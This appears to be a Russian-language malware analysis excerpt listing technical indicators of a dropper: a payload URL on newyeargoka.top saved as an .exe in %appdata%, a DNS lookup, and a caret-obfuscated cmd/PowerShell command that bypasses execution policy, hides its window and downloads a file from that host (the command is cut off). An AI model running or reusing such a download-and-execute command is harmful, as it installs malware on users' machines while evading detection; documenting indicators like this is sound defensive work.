Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powEr^sh^ElL.^exE^ -exEcUtION^po^L^i^c^Y b^ypA^Ss -^nOp^ro^fi^Le -^WINDOW^STYLe^ ^Hi^d^deN^ (^New^-objECT^ ^Syst^E^M.n^e^t.We^BcLiENT).DOw^N^lo^Adf^iL^e^('http://newyear...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "powEr^sh^ElL.^exE^ -exEcUtION^po^L^i^c^Y b^ypA^Ss -^nOp^ro^fi^Le -^WINDOW^STYLe^ ^Hi^d^deN^ (^New^-objECT^ ^Syst^E^M.n^e^t.We^BcLiENT).DOw^N^lo^Adf^iL^e^('http://newyear...' (со скрытым окном)